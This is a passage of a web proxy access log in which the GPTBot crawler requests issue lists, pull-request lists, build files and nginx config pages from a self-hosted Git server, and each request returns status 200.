like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11182] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:19:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108640] [Gzip 18.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:19:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 109024] [Gzip 18.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:19:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:19:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 107406] [Gzip 18.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:19:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2fPostgresWatchdog.exe" [Client 74.7.227.38] [Length 23787] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:19:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 13013] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:19:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 14086] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:19:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 13227] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:19:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 13005] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:19:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 21410] [Gzip 10.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13915] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15021] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?state=open&type=all" [Client 74.7.227.38] [Length 10096] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:19:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] 